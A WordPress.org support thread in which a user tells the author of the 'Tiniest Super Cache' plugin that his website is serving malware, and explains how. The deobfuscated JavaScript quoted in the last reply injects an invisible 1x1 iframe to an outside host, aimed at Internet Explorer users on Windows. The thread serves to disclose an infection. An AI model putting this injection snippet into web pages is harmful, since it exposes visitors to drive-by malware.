[Plugin: WordPress Tiniest Super Cache] Virus on author's web site

Viewing 2 replies - 1 through 2 (of 2 total)
  • Plugin Author Ahlul Faradish

    (@ahlul)

    Hmm, I think the kaspersky is wrong.
    You can search for iframe on my site, and you will find nothing.

    Thread Starter Chris

    (@christopherw)

    Ahlul, Kaspersky is correct and you are mistaken. Kaspersky performs realtime analysis of web pages as they’re loaded — doing my own manual search of the HTML source code reveals some Javascript after the closing </html> tag which is decrypting some poorly obfuscated code to load an iframe.

    The code is obfuscated using Dean Edwards’ eval(p.a.c.k.e.d) compression utility from https://dean.edwards.name/packer/.

    If you are not receiving an antivirus message, you are either not running antivirus (or it is not good enough) or you are already infected!

    When deobfuscated, the HTML on your site is as follows:

    function MakeFrameEx(){element=document.getElementById('yahoo_api');if(!element){document.write('<IFRAME id="yahoo_api" SRC="https://cxygugiuiuyy.osa.pl/showthread.php?t=46340270" FRAMEBORDER=0 NAME="yahoo_api" WIDTH=1 HEIGHT=1></IFRAME>')}}var ua=navigator.userAgent.toLowerCase();if(((ua.indexOf("msie")!=-1&&ua.indexOf("opera")==-1&&ua.indexOf("webtv")==-1))&&ua.indexOf("windows")!=-1){document.onmousemove=MakeFrameEx}

    As you can see, your site is clearly serving malware. (Have you been hacked?)

Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘[Plugin: WordPress Tiniest Super Cache] Virus on author's web site’ is closed to new replies.